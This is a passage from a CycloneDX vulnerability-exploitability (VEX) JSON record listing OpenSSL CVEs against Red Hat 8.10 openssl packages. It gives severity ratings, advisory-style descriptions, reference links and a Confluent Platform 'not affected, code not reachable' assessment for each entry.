          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-42770",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        325
      ],
      "description": "Issue summary: When EVP_PKEY_derive_set_peer() is called with a DHX (X9.42)\npeer key, the peer key is not properly checked for the subgroup membership.\n\nImpact summary: A malicious peer which presents an X9.42 key carrying the\nvictim's p and g parameters, a forged q = r (a small prime factor of the\ncofactor (p\u22121)/q_local), and a public value Y of order r can recover the\nvictim's private key after a small number of key exchange attempts.\n\nWhen EVP_PKEY_derive_set_peer() is called with a DHX (X9.42) peer key, the\nsubgroup membership check Y^q \u2261 1 (mod p) is performed using the peer's\nown q parameter, not the local key's q. The peer's domain parameters are\nthen matched against the domain parameters of the private key, but the value\nof q is not compared.\n\nA malicious peer who presents an X9.42 key carrying the victim's p, g,\na forged q = r (a small prime factor of the cofactor), and a public\nvalue Y of order r passes all checks. The shared secret then takes only\nr distinct values, leaking priv mod r. Repeating for each small-prime\nfactor of the cofactor and combining via CRT recovers the full private\nkey (Lim\u2013Lee / small-subgroup-confinement attack).\n\nThe realistic attack surface is narrow: principally CMP deployments with\nlong-lived RA/CA DHX keys and bespoke enterprise or government applications\nusing X9.42 DHX static keys with interactive protocols and therefore this\nissue was assigned Low severity.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4, 3.1.2 and 3.0 are affected by this\nissue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42770"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25237"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25239"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42770"
        },
        {
          "url": "https://bugzilla.redhat.com/2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/2481898"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481898"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-25237.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:25239"
        },
        {
          "url": "https://github.com/advisories/GHSA-3cxm-476w-ghm2"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/3da5a516cd2635a320ff748503db2cef7c4b0f02"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/3ddbb7ab50bd93dfc59cbe08e269a67605aeebdb"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/5f452bba2c681423d8fcffd120a19b757ee42e3c"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7fbfde7677ed8808828bf00ff01c937ca04bdda2"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/ca2237ab5615641b662183b077f62c08d75e8070"
        },
        {
          "url": "https://github.com/openssl/security/commit/3da5a516cd2635a320ff748503db2cef7c4b0f02"
        },
        {
          "url": "https://github.com/openssl/security/commit/3ddbb7ab50bd93dfc59cbe08e269a67605aeebdb"
        },
        {
          "url": "https://github.com/openssl/security/commit/5f452bba2c681423d8fcffd120a19b757ee42e3c"
        },
        {
          "url": "https://github.com/openssl/security/commit/7fbfde7677ed8808828bf00ff01c937ca04bdda2"
        },
        {
          "url": "https://github.com/openssl/security/commit/ca2237ab5615641b662183b077f62c08d75e8070"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-42770.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50379.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42770"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42770"
        }
      ],
      "published": "2026-06-09T17:17:08+00:00",
      "updated": "2026-07-23T08:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-42771",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        125
      ],
      "description": "Issue summary: When the X509_VERIFY_PARAM_set1_email is called by an\napplication to validate a crafted e-mail address, such as during S/MIME\nmessage validation, an out of bounds read can happen.\n\nImpact summary: This out of bounds read will not directly exfiltrate\nthe data read to the attacker so the most likely result is a crash and\na Denial of Service.\n\nAn internal helper function called from X509_VERIFY_PARAM_[set|add]_email()\nused a wrong length when validating the local part of an email address.\nThis could cause the 64 octet limit on the local part of an email address\nto be not enforced, or cause an out of bound read and potentially a crash.\n\nThe bug is reachable via S-MIME validation with a crafted From: address\nsupplied in an email message that can potentially cause a crash.\n\nNo FIPS modules are affected by this issue as the affected code is outside\nthe OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42771"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42771"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/6cd187689f8180c1f8a3acde21f88190c4a20de7"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42771"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42771"
        }
      ],
      "published": "2026-06-09T17:17:08+00:00",
      "updated": "2026-07-23T08:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
